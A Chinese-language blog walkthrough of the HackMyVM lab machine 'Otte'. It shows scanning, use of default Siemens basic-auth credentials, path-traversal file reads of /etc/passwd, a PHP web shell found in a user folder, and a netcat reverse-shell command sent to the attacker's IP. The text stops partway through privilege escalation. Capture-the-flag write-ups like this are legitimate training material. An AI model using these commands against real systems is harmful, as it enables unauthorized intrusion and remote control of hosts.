{"id":888,"date":"2025-06-18T02:43:46","date_gmt":"2025-06-17T18:43:46","guid":{"rendered":"http:\/\/162.14.82.114\/?p=888"},"modified":"2025-06-18T02:43:46","modified_gmt":"2025-06-17T18:43:46","slug":"hmv-_-otte","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/888\/06\/18\/2025\/","title":{"rendered":"hmv[-_-]Otte"},"content":{"rendered":"<h1>Otte<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240502.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240502.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616180007004\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240503.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240503.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617232353022\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nTo scan or not to scan? That is the question.\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.108:21\nOpen 192.168.10.108:22\nOpen 192.168.10.108:80\n\nPORT   STATE SERVICE REASON         VERSION\n21\/tcp open  ftp     syn-ack ttl 64 ProFTPD\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--   1 ftp      ftp            89 May 15  2021 note.txt\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYneKoJwfqvMUUCm3aYEtCzVDOXno3h\/cjEKDMkKsyV6A0jHvvFV6q0lnLhTWlulQyy\/8o9x2qDYX8WWSC7nEIPJuuSgG0u28qseHaOQ2\/1VtJkXoecGasDnA1tdX6wyMrsBWXAFSnYZivTEWkql\/G8Qrq+zbrBLx+LRtBT3RGYQ7M\/58MbfwutxwzsM8azvM2g1G\/+JgYMYUCaIn99LFqQW30epEH1d2WQgOQ3QDieX9ud9EIuFd8cpRPxdwVqZtwGh68t0iU2bai\/f82dLO9bYd+JoGZZWilq3zsSLFBBfRwZ1EN3NchsSVA7PT98AK3kIb3xxshwP7hoWX4cdVB\n|   256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMjfvd6KRqdEXuLIW3PsErVOibeTXfWPGDRPjKXp7Z8\/y1RdsnpXDaDZzTDVIeh0uuV4z7MuXqLHlNyYX8ehA4w=\n|   256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGydeBfPFELqTE9RELwcY11rKBLbzatrGxqsTQPl0c2V\n80\/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38\n|_http-title: 401 Unauthorized\n|_http-server-header: Apache\/2.4.38 (Debian)\n| http-auth: \n| HTTP\/1.1 401 Unauthorized\\x0D\n|_  Basic realm=Siemens - Root authentification\nMAC Address: 08:00:27:41:54:C1 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p>\u7c97\u7565\u626b\u4e86\u4e00\u4e0b\u5565\u90fd\u6ca1\uff0c\u7b97\u4e86\u3002\u3002\u3002<\/p>\n<h3>\u654f\u611f\u7aef\u53e3<\/h3>\n<p>\u53d1\u73b0\u53ef\u4ee5\u533f\u540d\u767b\u5f55\uff0c\u5c1d\u8bd5\u770b\u770b\u6709\u4e9b\u5565\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ lftp $IP\nlftp 192.168.10.108:~&gt; ls\n-rw-r--r--   1 ftp      ftp            89 May 15  2021 note.txt\nlftp 192.168.10.108:\/&gt; get note.txt \n89 bytes transferred                   \nlftp 192.168.10.108:\/&gt; exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ cat note.txt \nHi thomas ! I put on you personal folder the php code you asked me ! \n\nSee you later +++<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240505.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240505.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617233137493\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u7206\u7834\u767b\u5f55\u754c\u9762\uff08\u5931\u8d25\uff09<\/h3>\n<p>ftp \u5f97\u5230\u4e86\u4e00\u4e2a\u7528\u6237\u540d<code>thomas<\/code>\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff1f<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240506.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240506.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617234204196\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ echo &#039;YWRtaW46cGFzc3dvcmQ=&#039; | base64 -d                  \nadmin:password<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240507.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240507.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617234746116\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u5e76\u672a\u7206\u7834\u51fa\u7ed3\u679c\u3002\u3002\u3002\u3002<\/p>\n<h3>\u9ed8\u8ba4\u7528\u6237\u767b\u5f55<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ whatweb http:\/\/$IP                    \nhttp:\/\/192.168.10.108 [401 Unauthorized] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.108], Title[401 Unauthorized], WWW-Authenticate[Siemens - Root authentification][Basic]<\/code><\/pre>\n<p>\u68c0\u7d22\u4e00\u4e0b\uff1a<\/p>\n<blockquote>\n<p><a href=\"https:\/\/www.192-168-1-1-ip.co\/router\/siemens\/s7-1200-s7-1500\/17618\/\">https:\/\/www.192-168-1-1-ip.co\/router\/siemens\/s7-1200-s7-1500\/17618\/<\/a><\/p>\n<p><a href=\"https:\/\/hackmd.io\/@tuBp9oxkSra7nw4TNItvUg\/BkVIccr-j\">https:\/\/hackmd.io\/@tuBp9oxkSra7nw4TNItvUg\/BkVIccr-j<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-text\">root:zP2wxY4uE<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240508.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240508.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617235928430\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ echo &quot;root:zP2wxY4uE&quot; | base64                           \ncm9vdDp6UDJ3eFk0dUUK\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ curl -s http:\/\/root:zP2wxY4uE@192.168.10.108\/             \n&lt;img src=&quot;image.jpg&quot; alt=&quot;&quot;&gt;\n\n# wget http:\/\/root:zP2wxY4uE@$IP\/image.jpg\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ exiftool image.jpg \nExifTool Version Number         : 13.25\nFile Name                       : image.jpg\nDirectory                       : .\nFile Size                       : 47 kB\nFile Modification Date\/Time     : 2021:05:15 07:54:52-04:00\nFile Access Date\/Time           : 2025:06:17 12:06:50-04:00\nFile Inode Change Date\/Time     : 2025:06:17 12:08:06-04:00\nFile Permissions                : -rw-rw-r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : None\nX Resolution                    : 1\nY Resolution                    : 1\nImage Width                     : 700\nImage Height                    : 500\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 700x500\nMegapixels                      : 0.350\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt image.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.57% (132.9 MB)           \n[!] error: Could not find a valid passphrase.<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240509.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240509.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618001623785\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">Authorization: Basic cm9vdDp6UDJ3eFk0dUU=<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html -H &quot;Authorization: Basic cm9vdDp6UDJ3eFk0dUU=&quot; 2&gt;\/dev\/null\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.108\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 279]\n\/index.php            (Status: 200) [Size: 28]\n\/.php                 (Status: 403) [Size: 279]\n\/image                (Status: 200) [Size: 47076]\n\/config.php           (Status: 200) [Size: 0]\n\/thinkgeek.php        (Status: 200) [Size: 28]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]\n^C\n[!] Keyboard interrupt detected, terminating.\n\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h3>FUZZ LFI<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ ffuf -u &quot;http:\/\/$IP\/thinkgeek.php?FUZZ=..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot; -H &quot;Authorization: Basic cm9vdDp6UDJ3eFk0dUU=&quot; -c -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -fw 3 2&gt;\/dev\/null\nfile                    [Status: 200, Size: 1646, Words: 14, Lines: 32, Duration: 20ms]<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ curl -s &quot;http:\/\/root:zP2wxY4uE@192.168.10.108\/thinkgeek.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nthomas:x:1000:1000:thomas,,,:\/home\/thomas:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmysql:x:106:113:MySQL Server,,,:\/nonexistent:\/bin\/false\nproftpd:x:107:65534::\/run\/proftpd:\/usr\/sbin\/nologin\nftp:x:108:65534::\/srv\/ftp:\/usr\/sbin\/nologin\nlaetitia:x:1001:1001:,,,:\/home\/laetitia:\/bin\/bash\ncedric:x:1002:1002:,,,:\/home\/cedric:\/bin\/bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ curl -s &quot;http:\/\/root:zP2wxY4uE@192.168.10.108\/thinkgeek.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot; | grep sh | cut -d: -f1\nroot\nsshd\nthomas\nlaetitia\ncedric<\/code><\/pre>\n<h3>FUZZ\u6076\u610f\u6587\u4ef6\u53cd\u5f39shell<\/h3>\n<p>\u6ce8\u610f\u5230 ftp \u6587\u4ef6\u8bf4\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">Hi thomas ! I put on you personal folder the php code you asked me !<\/code><\/pre>\n<p>\u8bf4\u660e\u5176\u5bb6\u76ee\u5f55\u4e0b\u6709\u4e00\u4e2a php \u6587\u4ef6\uff0c\u5c1d\u8bd5 fuzz \u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ ffuf -u &quot;http:\/\/$IP\/thinkgeek.php?file=..\/..\/..\/..\/..\/..\/..\/..\/home\/thomas\/FUZZ.php&quot; -H &quot;Authorization: Basic cm9vdDp6UDJ3eFk0dUU=&quot; -c -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-large-directories-lowercase.txt -fs 0 2&gt;\/dev\/null\nshell                   [Status: 200, Size: 20, Words: 3, Lines: 3, Duration: 102ms]<\/code><\/pre>\n<p>\u518d\u8fdb\u884c fuzz \u4e00\u4e0b\u53c2\u6570\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ ffuf -u &quot;http:\/\/$IP\/thinkgeek.php?file=..\/..\/..\/..\/..\/..\/..\/..\/home\/thomas\/shell.php&amp;FUZZ=id&quot; -H &quot;Authorization: Basic cm9vdDp6UDJ3eFk0dUU=&quot; -c -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-large-directories-lowercase.txt -fs 20 2&gt;\/dev\/null\nfile                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5ms]\ncommand                 [Status: 200, Size: 74, Words: 5, Lines: 4, Duration: 93ms]<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ curl -s &quot;http:\/\/root:zP2wxY4uE@192.168.10.108\/thinkgeek.php?file=\/..\/..\/..\/..\/..\/..\/..\/..\/home\/thomas\/shell.php&amp;command=id&quot;\nHave fun !&lt;br&gt;&lt;br&gt;\n\nuid=33(www-data) gid=33(www-data) groups=33(www-data)<\/code><\/pre>\n<p>\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ curl -s &quot;http:\/\/root:zP2wxY4uE@192.168.10.108\/thinkgeek.php?file=\/..\/..\/..\/..\/..\/..\/..\/..\/home\/thomas\/shell.php&amp;command=nc+-e\/bin\/bash+192.168.10.107+1234&quot;\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240510.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240510.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618004105253\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@otte:\/home\/thomas$ ls -la\ntotal 96\ndrwxr-xr-x 4 thomas thomas  4096 May 17  2021 .\ndrwxr-xr-x 5 root   root    4096 May 16  2021 ..\nlrwxrwxrwx 1 thomas thomas     9 May 16  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 thomas thomas   220 May 15  2021 .bash_logout\n-rw-r--r-- 1 thomas thomas  3526 May 17  2021 .bashrc\ndrwxr-xr-x 3 thomas thomas  4096 May 15  2021 .local\n-rw-r--r-- 1 thomas thomas   807 May 15  2021 .profile\ndrwx------ 2 thomas thomas  4096 May 17  2021 .ssh\n-rw-r--r-- 1 thomas thomas 61258 May 15  2021 important_file\n-rw-r--r-- 1 thomas thomas   122 May 15  2021 nightmare.txt\n-rwxr-xr-x 1 thomas thomas    93 May 17  2021 shell.php\n(remote) www-data@otte:\/home\/thomas$ cat shell.php\n&lt;?php \necho &quot;Have fun !&quot;; \necho &quot;&lt;br&gt;&quot;;\necho &quot;&lt;br&gt;&quot;;\n?&gt;\n\n&lt;?php system($_GET[&#039;command&#039;]); ?&gt;\n(remote) www-data@otte:\/home\/thomas$ cat nightmare.txt\nwho is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!\n(remote) www-data@otte:\/home\/thomas$ file important_file\nimportant_file: ASCII text<\/code><\/pre>\n<h3>\u4fee\u8865\u6587\u4ef6\u5934\u83b7\u53d6\u5bc6\u94a5<\/h3>\n<p>\u770b\u4e00\u4e0b\u6587\u4ef6\u5934\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@otte:\/home\/thomas$ head important_file \n00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452  .XXX........IHDR\n00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.\n00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio\n00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737\n00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT\n00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .\n00000060: 2214 410a 2208 2294 8214 4428 8582 286a  &quot;.A.&quot;.&quot;...D(..(j\n00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....\n00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8  x..16&amp;.....G&gt;_..\n00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f  ......5.g.w=0.|.<\/code><\/pre>\n<p>\u53d1\u73b0\u5176\u624b\u52a8\u53bb\u9664\u4e86\u6587\u4ef6\u5934\uff0c\u9700\u8981\u8fdb\u884c\u7834\u89e3<code>XXXXXXXXXXXXXXXX<\/code>\u6b63\u597d 16 \u4f4d\uff0c\u7136\u540e\u5c31\u8bd5\u4e86\u4e00\u4e0b\u5e38\u89c1\u7684\u51e0\u4e2a\u6587\u4ef6\u540e\u7f00\u7684\u6807\u8bc6\uff1a<\/p>\n<pre><code class=\"language-bash\">52 61 72 21 1A 07 01 00     rar\n89 50 4E 47 0D 0A 1A 0A     